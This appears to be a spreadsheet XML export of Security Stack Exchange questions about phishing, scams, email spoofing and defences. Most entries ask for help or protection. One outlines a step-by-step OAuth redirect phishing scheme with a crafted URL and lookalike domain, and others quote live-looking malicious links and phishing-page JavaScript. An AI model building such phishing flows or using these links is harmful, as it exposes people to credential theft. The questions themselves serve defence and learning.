 ------=_Part_5085974_319880981.1424795118189--
 ------=_Part_5085973_1976669953.1424795118189--
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;Here's the SMTP transaction log:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;Feb 24 16:25:19 helios postfix/smtpd[28347]: connect from prg18.ff.avast.com[77.234.40.28]
 Feb 24 16:25:19 helios sqlgrey: grey: new: 77.234.40(77.234.40.28), myavast@avast.com -&amp;gt; redacted@redacted.com
 Feb 24 16:25:19 helios postfix/smtpd[28347]: NOQUEUE: reject: RCPT from prg18.ff.avast.com[77.234.40.28]: 450 4.7.1 &amp;lt;redacted@redacted.com&amp;gt;: Recipient address rejected: Greylisted for 5 minutes; from=&amp;lt;myavast@avast.com&amp;gt; to=&amp;lt;redacted@redacted.com&amp;gt; proto=ESMTP helo=&amp;lt;prg18.ff.avast.com&amp;gt;
 Feb 24 16:25:19 helios postfix/smtpd[28347]: disconnect from prg18.ff.avast.com[77.234.40.28]
 Feb 24 16:28:39 helios postfix/anvil[28329]: statistics: max connection rate 2/60s for (smtp:66.45.103.63) at Feb 24 16:23:23
 Feb 24 16:28:39 helios postfix/anvil[28329]: statistics: max connection count 2 for (smtp:66.45.103.63) at Feb 24 16:23:23
 Feb 24 16:28:39 helios postfix/anvil[28329]: statistics: max cache size 1 at Feb 24 16:23:22
 Feb 24 16:31:38 helios postfix/smtpd[28367]: connect from prg18.ff.avast.com[77.234.40.28]
 Feb 24 16:31:39 helios sqlgrey: grey: reconnect ok: 77.234.40(77.234.40.28), myavast@avast.com -&amp;gt; redacted@redacted.com (00:06:20)
 Feb 24 16:31:39 helios sqlgrey: grey: from awl: 77.234.40, myavast@avast.com added
 Feb 24 16:31:39 helios postfix/smtpd[28367]: 29FDE338513: client=prg18.ff.avast.com[77.234.40.28]
 Feb 24 16:31:39 helios postfix/cleanup[28370]: 29FDE338513: message-id=&amp;lt;2116255645.5085975.1424795118191.JavaMail.id@ams01-022.ff.avast.com&amp;gt;
 Feb 24 16:31:39 helios postfix/qmgr[13941]: 29FDE338513: from=&amp;lt;myavast@avast.com&amp;gt;, size=2691, nrcpt=1 (queue active)
 Feb 24 16:31:39 helios postfix/smtpd[28367]: disconnect from prg18.ff.avast.com[77.234.40.28]
 Feb 24 16:31:39 helios postfix/local[28371]: 29FDE338513: to=&amp;lt;redacted@helios.redacted.com&amp;gt;, orig_to=&amp;lt;redacted@redacted.com&amp;gt;, relay=local, delay=0.3, delays=0.26/0.03/0/0.01, dsn=2.0.0, status=sent (delivered to mailbox)
 Feb 24 16:31:39 helios postfix/qmgr[13941]: 29FDE338513: removed
 &lt;/code&gt;&lt;/pre&gt;</t>
  </si>
  <si>
    <t>&lt;phishing&gt;&lt;smtp&gt;</t>
  </si>
  <si>
    <t>Prevent phishing attacks through abuse of Apple iOS URL scheme</t>
  </si>
  <si>
    <t>&lt;p&gt;I am building an Apple iOS application that will have the following flow:&lt;/p&gt;
 &lt;ol&gt;
 &lt;li&gt;A user completes registration from the web.&lt;/li&gt;
 &lt;li&gt;Upon completion of registration, a link is sent to his email.&lt;/li&gt;
 &lt;li&gt;Once the link is clicked on an iOS device, my iOS app will be launched and will prompt the user for credentials.&lt;/li&gt;
 &lt;/ol&gt;
 &lt;p&gt;The thing is another malicious app can register to the same URL scheme as my app. In such a situation, the malicious app can be launched instead of my legitimate app, and easily steal the credentials of my users.&lt;/p&gt;
 &lt;p&gt;What can I do prevent data leakage in this situation? (i.e. make sure that the malicious app cannot imitate my app and/or implement a mechanism that will enable users to easily differentiate between my app and the malicious app)&lt;/p&gt;
 &lt;p&gt;I've seen some answers here: &lt;a href="https://stackoverflow.com/questions/30461145/best-practices-in-dealing-with-the-abuse-of-custom-url-scheme-to-make-phishing-a"&gt;https://stackoverflow.com/questions/30461145/best-practices-in-dealing-with-the-abuse-of-custom-url-scheme-to-make-phishing-a&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;But all of them propose implementing a mechanism that will eventually enable the malicious application to completely imitate my application.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;mobile&gt;&lt;ios&gt;&lt;phishing&gt;&lt;url-redirection&gt;&lt;registration&gt;</t>
  </si>
  <si>
    <t>Suspicious phone call claiming MS Office not updated lately</t>
  </si>
  <si>
    <t>&lt;p&gt;I recently received two phone calls where the caller indicated that according to their log activity, MS Office has not been updated lately. They offered to help me get those updates. What kinds of things might they really be looking for?&lt;/p&gt;
 &lt;p&gt;Setting up my machine to participate in DDOS came to mind.
 Harvesting my machine for 'identity theft info' would seem to require a lot of effort.&lt;/p&gt;
 &lt;p&gt;It didn't take long for the caller to hang up. Apparently I asked too many questions. An amusing part is his statement that my "computer machine" is not up to date.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;phishing&gt;&lt;phone&gt;</t>
  </si>
  <si>
    <t>OAuth: how to prevent phishing with malicious redirect URIs</t>
  </si>
  <si>
    <t>&lt;p&gt;To quote &lt;a href="https://www.rfc-editor.org/rfc/rfc6749#section-4.1.2.1" rel="nofollow noreferrer"&gt;the OAuth spec&lt;/a&gt;:&lt;/p&gt;
 &lt;blockquote&gt;
 &lt;p&gt;If the resource owner denies the access request or if the request fails for reasons other than a missing or invalid redirection URI, the authorization server informs the client by adding the following parameters to the fragment component of the redirection URI using the &amp;quot;application/x-www-form-urlencoded&amp;quot; format, per Appendix B:&lt;/p&gt;
 &lt;p&gt;...&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;Let's say I'm trying to phish an Example.com account. What prevents me from doing an attack like this:&lt;/p&gt;
 &lt;ol&gt;
 &lt;li&gt;Register a similar-looking domain. We'll use &lt;code&gt;https://ex√°mple.com&lt;/code&gt; for this example.&lt;/li&gt;
 &lt;li&gt;Set up &lt;code&gt;ex√°mple.com/login&lt;/code&gt; to look like the real Example.com's login so I can steal credentials.&lt;/li&gt;
 &lt;li&gt;Register an OAuth app with a redirect URI of &lt;code&gt;https://ex√°mple.com/login&lt;/code&gt;.&lt;/li&gt;
 &lt;li&gt;Construct a deliberately-invalid OAuth authorization request and get a user to visit it. It might look like this: &lt;code&gt;https://example.com/oauth/authorize?redirect_uri=https%3A%2F%2Fex%C3%A1mple.com%2Flogin&amp;amp;client_id=MY_CLIENT_ID&amp;amp;scope=bogus&lt;/code&gt;&lt;/li&gt;
 &lt;li&gt;When the user visits it, the real &lt;code&gt;example.com&lt;/code&gt; will see that my request is invalid (&lt;code&gt;scope&lt;/code&gt; was bogus).&lt;/li&gt;
 &lt;li&gt;&lt;code&gt;example.com&lt;/code&gt; will redirect to &lt;code&gt;https://ex√°mple.com/login?error=invalid_request&lt;/code&gt; (or similar), which I've set up to phish Example.com users.&lt;/li&gt;
 &lt;/ol&gt;
 &lt;p&gt;This isn't the biggest vulnerability in the world, but if I can trick you into clicking on a link, I can take over your account. I expect a lot of users would click any URL where the domain was &lt;code&gt;google.com&lt;/code&gt;, for example.&lt;/p&gt;
 &lt;p&gt;What steps can an OAuth provider take against such an attack? In the example above, what could Example.com do?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;oauth&gt;&lt;phishing&gt;&lt;url-redirection&gt;&lt;oauth2&gt;</t>
  </si>
  <si>
    <t>Ongoing Executive Impersonation Attack</t>
  </si>
  <si>
    <t>&lt;p&gt;A friend of mine runs a small business that was recently targeted by a relatively sophisticated &lt;a href="http://krebsonsecurity.com/2015/08/fbi-1-2b-lost-to-business-email-scams/" rel="nofollow"&gt;"executive impersonation" wire transfer spearphishing attack&lt;/a&gt;. The attacker registered a domain that was a slight variant to the target company's that was visually similar, and spoofed a convincing E-mail to the company's finance department requesting a wire transfer to a provided bank account. The domain name is registered through Google, whois information is anonymized through a proxy, and the E-mail was sent using the Google Apps' Gmail web interface.&lt;/p&gt;
 &lt;p&gt;Fortunately, the company's security policies were robust enough to catch the fraud before any funds were transferred. One of the details about this incident that seems odd based upon what I've read about similar attacks is that the bank account was based in the United States, and is associated with a domestic address near the bank.&lt;/p&gt;
 &lt;p&gt;The relevant authorities were notified, including the bank, Google, the whois proxy service, police local to the target company, police local to the bank, the FBI, and DHS. The police local to the bank seemed mildly interested, and actually visited the address associated with the account, but no one was there. Among the other authorities, either they have yet to respond or they are uninterested in helping, since no actual money was transferred/lost. The dollar amount was also relatively small for fraud like this (low five figures).&lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;As of the time of this posting, the attackers are still being strung along and believe that the wire transfer will occur.&lt;/strong&gt;&lt;/p&gt;
 &lt;p&gt;I have two questions:&lt;/p&gt;
 &lt;ol&gt;
 &lt;li&gt;Is it typical for these attacks to be associated with domestic US bank accounts? Does that imply that the attacker is also domestic?&lt;/li&gt;
 &lt;li&gt;Given that the attackers are still actively engaged, and assuming the authorities are unwilling to investigate, is there anything that can be done to reveal more information about the attackers? I realize that &lt;a href="http://www.419eater.com/html/baiting.htm" rel="nofollow"&gt;419-style scam baiting&lt;/a&gt; probably won't work for a situation like this, and vigilantism is unadvisable, especially if the attackers are domestic. But perhaps there is something relatively passive that could be done to help catch the attackers?&lt;/li&gt;
 &lt;/ol&gt;
 &lt;p&gt;&lt;strong&gt;Update:&lt;/strong&gt; One of the federal agencies finally expressed some interest and started guiding the ongoing communication with the attackers.&lt;/p&gt;</t>
  </si>
  <si>
    <t>Does attaching malware or virus in an email count as Phishing attack</t>
  </si>
  <si>
    <t>&lt;p&gt;I know that Phishing attacks try to gain access or sensitive information from the user or victim. This attack comes under the Social Engineering attack, where personal confidential data such as login credentials, credit card details, etc., are tried to gain from the victim with human interaction by an attacker.&lt;/p&gt;
 &lt;p&gt;But let's say someone attaches a virus or malware inside an email, where this virus or malware is responsible to track the user's inputs on certain sites to gain access to sensitive info, does this attack count as Phishing attack?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;malware&gt;&lt;phishing&gt;&lt;terminology&gt;</t>
  </si>
  <si>
    <t>How did an attacker spoof (or add to) this myspace's login form?</t>
  </si>
  <si>
    <t>&lt;p&gt;In the attack detailed &lt;a href="http://news.netcraft.com/archives/2006/10/27/myspace_accounts_compromised_by_phishers.html" rel="nofollow"&gt;here&lt;/a&gt;, I see that a hacker has actually added a malicious &lt;code&gt;post&lt;/code&gt; link. What I do not understand is how the attacker added it to the actual &lt;code&gt;myspace.com&lt;/code&gt;domain. &lt;/p&gt;
 &lt;p&gt;Obviously this is an old issue but I'm still curious if there is an attack that can spoof the domain name itself.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;web-application&gt;&lt;xss&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>Pionee Red: Is this a Phishing attack? What should we do?</t>
  </si>
  <si>
    <t>&lt;p&gt;I have just received an email from a close friend, which had &lt;strong&gt;"Pionee Red"&lt;/strong&gt; as the subject, and the following body:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;you've a new private message from your friend
 Click To View The Full Message
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;As I hovered over the link, the following address appeared:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;http://107.183.127.168/l/?gapaxobi=xayimasodo&amp;amp;batipikumemajojipo=&amp;amp;id=d2lsc29ubWFyYXZpbGhhQGdtYWlsLmNvbQ==&amp;amp;xuranoteyu=d2lsc29ubWFyYXZpbGhh
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;When I followed the link (from my VM), it took me to the screen below:&lt;/p&gt;
 &lt;p&gt;&lt;img src="https://i.stack.imgur.com/EuriO.png" alt="Very Fake Google Login Page"&gt;&lt;/p&gt;
 &lt;p&gt;Where the email field was pre-filled with my actual email (not the one in the screenshot)&lt;/p&gt;
 &lt;p&gt;I went a little further and navigated to the IP contained in the original URL to see where that led, and it redirected many times before it finally took me to &lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;http://www.kiss4you.com/
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;...where I was invited to &lt;em&gt;Date Crazy in Happy Hours with more than 30 000 thousands of Beautiful Girls from Russia&lt;/em&gt;&lt;/p&gt;
 &lt;p&gt;Is that even a number? Crazy stuff. Anyway, what I wanted to ask is:&lt;/p&gt;
 &lt;ol&gt;
 &lt;li&gt;How badly might my friend's account be compromised?&lt;/li&gt;
 &lt;li&gt;Which security steps should we take?&lt;/li&gt;
 &lt;li&gt;Should we submit some sort of report anywhere about this?&lt;/li&gt;
 &lt;/ol&gt;</t>
  </si>
  <si>
    <t>Potential Western Union Scam - Account Registration</t>
  </si>
  <si>
    <t>&lt;p&gt;In recent weeks I have seen a handful of senior employees in my organization receive a confirmation email from Wester Union for a new account creation. The issue is that none of these users have created a WU account.&lt;/p&gt;
 &lt;p&gt;I have verified all links in the email and it is NOT a phishing campaign. These are legitimate emails from WU. But for some reason someone out there is registering WU accounts with my employee's business email addresses.&lt;/p&gt;
 &lt;p&gt;What I do not understand is why. Initial thoughts would be that this is an impersonation scam. However, the user's name in WU does not match the actual user's name (which the attacker clearly has in the email address schema)&lt;/p&gt;
 &lt;p&gt;What motivation would someone have for this type of 'attack'?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;email&gt;&lt;account-security&gt;&lt;email-spoofing&gt;&lt;scam&gt;</t>
  </si>
  <si>
    <t>Anti-Phishing Campaign Objective</t>
  </si>
  <si>
    <t>&lt;p&gt;At every office I have worked, links and files, both internal and external, are shared in emails. &lt;/p&gt;
 &lt;p&gt;Is the objective of an anti-phishing campaign that users never click on blind, or otherwise unknown, links? pdfs? Any file or link? &lt;/p&gt;
 &lt;p&gt;What is the expected recipient behavior? What should the average person do?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;phishing&gt;&lt;awareness&gt;&lt;professional-education&gt;</t>
  </si>
  <si>
    <t>How to reject e-mails spoofing your own domain targeting your employees at Office365?</t>
  </si>
  <si>
    <t>&lt;p&gt;One problem Office365 users deal with is that an external SMTP server can spoof the domain of an organization and send e-mails to the domain users; where the e-mails appear to be from employees of the organization. On the header the authentication results would look like this: &lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;spf=none dmarc=none dkim=none (message not signed) (sender IP is x.x.x.x) 
 smtp.mailfrom=theSpammer.xx; YourOwnDomain.com; YourOwnDomain.com; 
 header.from=YourOwnDomain.com; action=none header.d=none;
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;When the authentication values (e.g.,SPF) are not set, we cannot reject the e-mail. The From can be set to anyone at the organization, but the Reply-To and Return-Path can be set to the spammers choice to keep communicating with the scam victim at the target organization. &lt;/p&gt;
 &lt;p&gt;Does anyone have a solid solution to prevent the spammer and phishers sending e-mails that spoof the organization domain to send e-mails to the employees on that domain?&lt;/p&gt;
 &lt;p&gt;There is a recommendation here: &lt;a href="https://community.office365.com/en-us/f/148/t/239589"&gt;https://community.office365.com/en-us/f/148/t/239589&lt;/a&gt; that suggest creating a transport rule that filters e-mails originating from outside of organization while the sender's domain is the organization's domain. Has anyone used that successfully? &lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;email&gt;&lt;spam&gt;&lt;spoofing&gt;&lt;smtp&gt;&lt;domain&gt;</t>
  </si>
  <si>
    <t>How to get the statistics of users opening the attachment in a phishing mail during a social engineering campaign test?</t>
  </si>
  <si>
    <t>&lt;p&gt;I have to do a social engineering test for a friend's small company. He wants to know how many people opened the mail and then opened the attachment. How can I do that? The file can be anything- pdf,excel or doc. We do not want to send any malicious exe files as the aim is to check the awareness only.&lt;br&gt;
 Edit 1: Instead of downloading, the statistics to look for is "how many people opened the file?" &lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;malware&gt;&lt;phishing&gt;&lt;social-engineering&gt;</t>
  </si>
  <si>
    <t>What is the best way to protect against a phishing attack?</t>
  </si>
  <si>
    <t>&lt;p&gt;As stated in the title, what can I do on the server (or anywhere else for that matter) to protect against phishing attacks?&lt;/p&gt;
 &lt;p&gt;Some suggestions I've heard is to tell users that you'll never send them a link to click on. However, our password reset functionality is built around this. &lt;/p&gt;
 &lt;p&gt;We've also added two factor authentication, but a phishing attack can also easily bypass this through clever scripting that passes the user credentials to our site in real time.&lt;/p&gt;</t>
  </si>
  <si>
    <t>user12199</t>
  </si>
  <si>
    <t>How do you visit a link without risking your computer?</t>
  </si>
  <si>
    <t>&lt;p&gt;I got a link to &lt;code&gt;http://61.19.247.192/~naowit/dustin.html&lt;/code&gt;, which was masked as a youtube.com link via email. Now I'm not willing to visit it because I know it's probably got some type of malware on it, or at the very least a scam/phishing attempt. &lt;/p&gt;
 &lt;p&gt;But... I'm always curious when I get these links. I want to visit them to see what they are up to. I have Sandboxie, but is that secure enough if I simply run the browser in a sandbox? &lt;/p&gt;
 &lt;p&gt;In general, how should you visit links that you are unsure of? I always have NoScript running, but I know that's not enough.&lt;/p&gt;</t>
  </si>
  <si>
    <t>Which attributes of a WPA AP certificate are used by a client device in deciding if the certificate has been trusted before?</t>
  </si>
  <si>
    <t>&lt;p&gt;When connecting to a new AP, the client device will pop a warning to ask if the certificate of the new AP should be trusted. If trusted, the warning doesn't show anymore if the certificate is known to have been trusted before. What attributes of the certificate does the client use to determine if two certificates are the same? (E.g is it the CN or a hash of all the attributes of the certificate)&lt;/p&gt;
 &lt;p&gt;If the attributes used for comparison are trivial to spoof, does this mean that an attacker can easily set up a Rogue AP with the same exact certificate as the legitimate one and there will be no way to tell?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;certificates&gt;&lt;wireless&gt;&lt;phishing&gt;&lt;spoofing&gt;&lt;wpa-enterprise&gt;</t>
  </si>
  <si>
    <t>Are hardware security keys (e.g ones supporting Fido2) "able to protect authentication" even in case of compromised hosts?</t>
  </si>
  <si>
    <t>&lt;p&gt;Correct me if I am wrong, please.&lt;/p&gt;
 &lt;p&gt;I understand that 2FA (MFA) increases account security in case an attacker obtains a password which might be possible via various ways, e.g. phishing, database breach, brute-force, etc..&lt;/p&gt;
 &lt;p&gt;However, if the host where one uses the 2FA device is compromised (full system control) then 2FA is broken. It's not the same as haven the password being compromised but conceptually this is similar.&lt;/p&gt;
 &lt;p&gt;Do hardware security keys protect against compromised hosts? I read that the private key cannot be extracted from those security devices. I think about protecting my ssh logins with a FIDO2 key. Taking ssh as an example, I would imagine that on a compromised host the ssh handshake and key exchange can be intercepted and this way an inserted Fido2 key can be used for malicious things.&lt;/p&gt;
 &lt;p&gt;Additionally: Fido2 protects against phishing by storing the website it is setup to authenticate with. Does FIDO2 and openssh also additionally implement host key verification or doesn't it matter because FIDO2 with openssh is already asymmetric encryption and thus not vulnerable to MitM attacks?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;ssh&gt;&lt;multi-factor&gt;&lt;fido&gt;</t>
  </si>
  <si>
    <t>Accidently opened a phishing email .docx attachment on my iPhone, should I worry?</t>
  </si>
  <si>
    <t>&lt;p&gt;Two days ago, I received an email saying as object &amp;quot;March rent&amp;quot; in French. It says time to pay my rent for the month of March, and got the email March 1st... I thought this was my landlord sending me an email, as he sometimes do. However, there was no much info in the mail except a word document attachment .docx, that I opened to see what it was about. Found out this is a scam trying to makes me transfert money. Deleted.&lt;/p&gt;
 &lt;p&gt;The issue, I opened the attachment, and worst, I don't know what can happen.&lt;/p&gt;
 &lt;p&gt;I'm using an iPhone 7 on latest iOS, the attachment has been opened with the default Mail app.&lt;/p&gt;
 &lt;p&gt;Uploaded &lt;a href="https://www.virustotal.com/gui/file/c3b4dfeb29acf7da488be4ae8632090ab6210fab59f6adc6b263f3eadd4ae37b" rel="nofollow noreferrer"&gt;the file on Virustotal&lt;/a&gt;, nothing found.&lt;/p&gt;
 &lt;p&gt;Uploaded &lt;a href="https://www.hybrid-analysis.com/sample/c3b4dfeb29acf7da488be4ae8632090ab6210fab59f6adc6b263f3eadd4ae37b?environmentId=160" rel="nofollow noreferrer"&gt;the file on Hybrid-Analysis&lt;/a&gt; (sandbox run), nothing malicious seems to have been done.&lt;/p&gt;
 &lt;p&gt;Renamed .docx to .zip, extracted and inspected the content. Only found .xml stuff, nothing relevant here. Looks like the document contains no macros.&lt;/p&gt;
 &lt;p&gt;I'm still worried that something might have infected my device with that attachment, what can I do to get peace of mind ?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;virus&gt;&lt;iphone&gt;&lt;office&gt;&lt;email-attachments&gt;</t>
  </si>
  <si>
    <t>Is this INTERNET REGISTRAR email a phishing scam?</t>
  </si>
  <si>
    <t>&lt;p&gt;I am the "acting" IT person (very loose term) for our small company. I received this email yesterday. I am going to ignore it, but I was just curious how this could negatively effect me/us if I replied to it. I did some searching and found a few similar email reports on this, but no good explanations.&lt;/p&gt;
 &lt;p&gt;&lt;a href="https://i.stack.imgur.com/R1FfF.png" rel="nofollow noreferrer"&gt;&lt;img src="https://i.stack.imgur.com/R1FfF.png" alt="enter image description here"&gt;&lt;/a&gt; &lt;/p&gt;</t>
  </si>
  <si>
    <t>How are hackers able to plant Phishing URLs in existing websites?</t>
  </si>
  <si>
    <t>&lt;p&gt;As the question says, How are hackers able to plant Phishing URLs in existing websites? And can it be detected?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;phishing&gt;&lt;websites&gt;&lt;dns-domain&gt;</t>
  </si>
  <si>
    <t>Chrome + EMET= How Strong Realistic Protection Against Browser-Based Threats?</t>
  </si>
  <si>
    <t>&lt;p&gt;tl;dr: How secure is a combination of a sort-of hardened Google Chrome + Microsoft Enhanced Mitigation Experience Toolkit 5.1 against browser-based threats that I do &lt;em&gt;not&lt;/em&gt; expect to be highly targeted &amp;amp; sophisticated? Put another way, how realistic is it that a threat is going to exploit a vulnerability against a fully-patched Chrome and get out of Chrome's good sandbox in spite of EMET's added protections? &lt;/p&gt;
 &lt;hr&gt;
 &lt;p&gt;So not too long ago I took on a client who operates a small chain of businesses in my city. At each business location, there's a small network running 2 or 3 machines in a home/home-office configuration. (The small HQ location has a domain, but client has declined suggestions to join the PCs at the other locations to it. So, that's pretty set right now.) &lt;/p&gt;
 &lt;p&gt;Each of these separate locations has one PC on which quite sensitive financial information is processed. When I was taken on, there were, of course, tons of security problems with these sensitive machines--on all the clients PCs, actually--and with the various networks at each site. After lots of work, and plenty of persuasion with the company's HQ manager I'm working with about why it was important to let me address this issue and that issue, things are now in fairly decent shape. Got good segmentation from the sensitive machines in place, got every piece of software on every PC/device that I know of either patching properly or uninstalled, etc. &lt;/p&gt;
 &lt;p&gt;Except...&lt;/p&gt;
 &lt;p&gt;On these machines where the sensitive financial info (not credit/debit card info, but of similar sensitivity) is dealt with, managers at the locations really like to check their company Gmail accounts (in-browser) and do some web browsing here and there; it's become part of their workflows by now. I advised the HQ supervising manager that this was really, really not a good idea due to the phishing as malware-delivery vector risk, drive-by browser stuff, and so forth. But at the end of the day the decision was "Well, I think they need to use those computers for email and stuff. But try to make them as secure as you can."&lt;/p&gt;
 &lt;p&gt;Sigh.&lt;/p&gt;
 &lt;p&gt;Anyway, I'm thinking about the potential for doing something more involved (using a VM with a guest hardened Linux flavor &amp;amp; browser, or maybe something with app virtualization on a remote server), but the temporary setup I put in place as a Gmail-checking &amp;amp; web browsing security solution is considerably simpler: Google Chrome with ublock ad-blocker installed, Flash turned off for all sites except Gmail and GDrive, and no other plug-ins (ie. beyond Chrome's built-in Flash) even installed on the machine. Backing up Chrome's sandboxing &amp;amp; other security features I've got EMET 5.1 installed plus a serviceable anti-malware solution (for whatever they are worth). I have disabled Internet Explorer, no other browsers are installed, and a policy change e-mail went out on Friday prohibiting any attempts to install or use any other browsers on these machines.&lt;/p&gt;
 &lt;p&gt;(FYI, No Java, no Reader/Acrobat, no office doc suite or viewer, or any other very commonly program targeted programs are installed. The PCs where the sensitive operations occur are running either Windows 7 or 8.1. They are ultimately connected to Internet access because they must interface with a certain financial transactions service.)&lt;/p&gt;
 &lt;p&gt;Now, obviously the highest-security course of action would be to set these machines aside solely for sensitive info processing and get some new machines/devices (they are dirt cheap these days) for email and web browsing. (Segmented on the sub-networks away from sensitive operations, of course.) But let's assume that doesn't happen. Let's also assume, just for purposes of focusing on one issue here, that the company managers actually use only the "temporary" Chrome setup I've outlined above and don't break the new policy by trying/succeeding in installing Firefox or another browser or changing Chrome's settings. (They are running with user accounts now, but they do, alas, have access to admin passwords for the machines. "For emergencies when they can't get ahold of HQ." ) &lt;/p&gt;
 &lt;p&gt;Anyway, assuming those things, how much do I/they actually, realistically have to fear from browser attacks like phishing emails linking to sites with browser exploits, from malvertisements, from drive-by browsing attacks, etc. Attack code on a site or in a message itself would have to use a zero-day vulnerability (or, at most, a vuln only a few days past announcement, given that Chrome would probably be used/open, and thus have its auto-updater active, almost every working day), evade the anti-exploit protections of EMET, and breach Chrome's well-regarded sandbox to even get to user privileges. For safeguarding the systems of a company that (in my assessment) is pretty unlikely to face any well-targeted, really sophisticated spear-phishing attacks or the like, what level of real security do a hardened Chrome browser + EMET provide? Should I lighten up a bit and just let this stop-gap setup become permanent? &lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;web-browser&gt;&lt;chrome&gt;&lt;hardening&gt;&lt;emet&gt;</t>
  </si>
  <si>
    <t>How to prevent phishing proxy attack with tool like Evilginx?</t>
  </si>
  <si>
    <t>&lt;p&gt;How as a web developer I can prevent phishing proxy attack with a tool like Evilginx?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;man-in-the-middle&gt;&lt;proxy&gt;</t>
  </si>
  <si>
    <t>How plausible is this article on how SciHub acquires its papers?</t>
  </si>
  <si>
    <t>&lt;p&gt;&lt;a href="https://en.wikipedia.org/wiki/Sci-Hub" rel="nofollow noreferrer"&gt;Sci-Hub&lt;/a&gt; is a piracy website that provides free access to usually-paywalled academic papers &amp;amp; books. Sci-Hub's owner Alexandra Elbakyan says that many people with legitimate access to the papers/books donate their user IDs and passwords, which she then uses to acquire the paywalled material.&lt;/p&gt;
 &lt;p&gt;Countering the owner's claim is &lt;a href="https://scholarlykitchen.sspnet.org/2018/09/18/guest-post-think-sci-hub-is-just-downloading-pdfs-think-again/" rel="nofollow noreferrer"&gt;this article&lt;/a&gt; by Andrew Pitts, CEO of a cybersecurity firm. In the article, Andrew Pitts claims that Sci-Hub's user IDs and passwords are obtained illegally, via phishing, password cracking, hacking, and similar activities. It gives details that that look persuasive to me, but I lack the expertise to judge how credible the evidence is myself, and I was just told that the article provides no evidence and is written as an advertisement for getting the firm's help with security&lt;/p&gt;
 &lt;p&gt;Therefore I'm asking this question: does Andrew Pitts present a plausible case that Sci-Hub obtains user IDs and passwords via phishing, password cracking, etc? In other words, could the things he presents at evidence actually have happened? If no, why not?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;attacks&gt;&lt;attack-prevention&gt;</t>
  </si>
  <si>
    <t>Was redirected from MS Outlook to a phishing site. Need independent opinion on whether or not my computer is compromised</t>
  </si>
  <si>
    <t>&lt;p&gt;Hoping someone can look through the phishing HTML code I received and give me a second opinion whether or not I have been compromised. Also can anybody tell me what are telltale signs that suggests a payload exists in a site? Details (and code in pastebin link) below.&lt;/p&gt;
 &lt;p&gt;I received &lt;a href="http://pastebin.com/gSaP5UTu" rel="nofollow noreferrer"&gt;an e-mail&lt;/a&gt; from a someone I regularly e-mail with. They sent an e-mail regarding an progress communication with a hyperlink that has a &lt;code&gt;data:text/html;base64&lt;/code&gt; header in it.&lt;/p&gt;
 &lt;p&gt;It appears to be &lt;a href="http://pastebin.com/eLgUtMqs" rel="nofollow noreferrer"&gt;an obfuscated HTML page&lt;/a&gt;, which when decoded looks like an attempt at a google drive login page.&lt;/p&gt;
 &lt;p&gt;For some reason, Chrome auto-closed the tab whenever outlook redirected me into the page. I foolishly force opened it by going though my history. The site appears to be phishing for Google/Yahoo/etc account information and password. I did not enter any details into the site.&lt;/p&gt;
 &lt;p&gt;I only have rudimentary skills in HTML and JavaScript and as far as I can see it does not seem like arbitrary code has been executed on my browser and computer. But I'm hoping for someone to look through the decoded HTML and tell me if there are any problems before I take the nuclear option and reinstall the OS.&lt;/p&gt;
 &lt;p&gt;Note, I have spotted code that tries to identify my browser in the form of:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt; // Opera 8.0+
  var isOpera = (!!window.opr &amp;amp;&amp;amp; !!opr.addons) || !!window.opera || navigator.userAgent.indexOf(" OPR/") &amp;gt;= 0;
  // Firefox 1.0+
  var isFirefox = typeof InstallTrigger !== "undefined";
  // Safari 3.0+ "[object HTMLElementConstructor]" 
  var isSafari = Object.prototype.toString.call(window.HTMLElement).indexOf("Constructor") &amp;gt; 0 || (function (p) { return p.toString() === "[object SafariRemoteNotification]"; })(!window["safari"] || safari.pushNotification);
  // Chrome 1+
  var isChrome = !!window.chrome &amp;amp;&amp;amp; !!window.chrome.webstore;
  // Blink engine detection
  var isBlink = (isChrome || isOpera) &amp;amp;&amp;amp; !!window.CSS;
  //var output = "";
  if(isFirefox == true){
  var output = "Firefox";
  }else if(isChrome == true){
  var output = "Chrome";
  }else if(isSafari == true){
  var output = "Safari";
  }else if(isOpera == true){
  var output = "Opera";
  }else if(isBlink == true){
  var output = "Blink";
  }else{var output = "Unknown";}
  document.getElementById("browser").value = output;
 &lt;/code&gt;&lt;/pre&gt;</t>
  </si>
  <si>
    <t>&lt;malware&gt;&lt;http&gt;&lt;javascript&gt;&lt;phishing&gt;&lt;html&gt;</t>
  </si>
  <si>
    <t>Efficiency of end-user training</t>
  </si>
  <si>
    <t>&lt;p&gt;I have read a lot on the topic of enforcing end-user security training, such as how to spot a phishing email for example. Even enforced training, such as conferences or videos that the end-user must watch can easily be neglected or not cared for by the end-user. &lt;/p&gt;
